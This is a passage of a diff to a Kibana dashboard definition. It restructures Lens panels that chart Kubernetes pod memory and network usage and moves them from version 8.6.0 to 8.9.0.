}, + "meta": { + "alias": null, + "disabled": false, + "index": "ace482cc-b33b-47c1-89b1-a710fe45195e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 15, - "i": "98677dcb-ab94-47e8-94ca-326470ee2380", - "w": 24, - "x": 0, - "y": 34 + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "98677dcb-ab94-47e8-94ca-326470ee2380", - "title": "Memory Usage as Pct of the Total Node Memory [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "81de779f-3d8f-4f90-9a93-08ecf5d96939", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Memory Usage as Pct of the Total Node Memory [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "5575d413-c4a4-4e34-8605-54f82e5e05b3", + "w": 24, + "x": 24, + "y": 34 + }, + "panelIndex": "5575d413-c4a4-4e34-8605-54f82e5e05b3", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "81de779f-3d8f-4f90-9a93-08ecf5d96939", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "Memory Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 2 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "Memory Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.memory.usage.limit.pct" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.memory.usage.limit.pct" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "81de779f-3d8f-4f90-9a93-08ecf5d96939", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "81de779f-3d8f-4f90-9a93-08ecf5d96939", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "5575d413-c4a4-4e34-8605-54f82e5e05b3", - "w": 24, - "x": 24, - "y": 34 + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "5575d413-c4a4-4e34-8605-54f82e5e05b3", - "title": "Memory Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9d74e7d3-0a1c-4c8b-8635-1577d74797f7", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Memory Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "435eeb17-c28a-4bde-9c43-b85d8e463c03", + "w": 24, + "x": 0, + "y": 49 + }, + "panelIndex": "435eeb17-c28a-4bde-9c43-b85d8e463c03", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9d74e7d3-0a1c-4c8b-8635-1577d74797f7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "Memory Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 2 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "Memory Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.memory.working_set.limit.pct" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.memory.working_set.limit.pct" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "9d74e7d3-0a1c-4c8b-8635-1577d74797f7", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "9d74e7d3-0a1c-4c8b-8635-1577d74797f7", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 15, - "i": "435eeb17-c28a-4bde-9c43-b85d8e463c03", - "w": 24, - "x": 0, - "y": 49 + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "panelIndex": "435eeb17-c28a-4bde-9c43-b85d8e463c03", - "title": "Working Set Memory Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Working Set Memory Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "7a1ccd34-5b1c-445b-8f1f-00d792c49104", + "w": 24, + "x": 24, + "y": 49 + }, + "panelIndex": "7a1ccd34-5b1c-445b-8f1f-00d792c49104", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "710b0f49-b955-4cb8-826e-e51b3e6e7271", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "Network Usage", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "710b0f49-b955-4cb8-826e-e51b3e6e7271", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "Network Usage", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.network.tx.bytes" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.network.tx.bytes" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "710b0f49-b955-4cb8-826e-e51b3e6e7271", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "710b0f49-b955-4cb8-826e-e51b3e6e7271", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 15, - "i": "7a1ccd34-5b1c-445b-8f1f-00d792c49104", - "w": 24, - "x": 24, - "y": 49 + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "7a1ccd34-5b1c-445b-8f1f-00d792c49104", - "title": "Network Outgoing Bytes per Pod [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Network Outgoing Bytes per Pod [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "72b97d6f-17f7-44b0-87a9-e272981c7565", + "w": 24, + "x": 0, + "y": 64 + }, + "panelIndex": "72b97d6f-17f7-44b0-87a9-e272981c7565", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "31f6a38e-250d-4a00-9f2a-af9c53aff800", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "Network Usage", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "31f6a38e-250d-4a00-9f2a-af9c53aff800", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "Network Usage", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.network.rx.bytes" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.network.rx.bytes" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "31f6a38e-250d-4a00-9f2a-af9c53aff800", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - 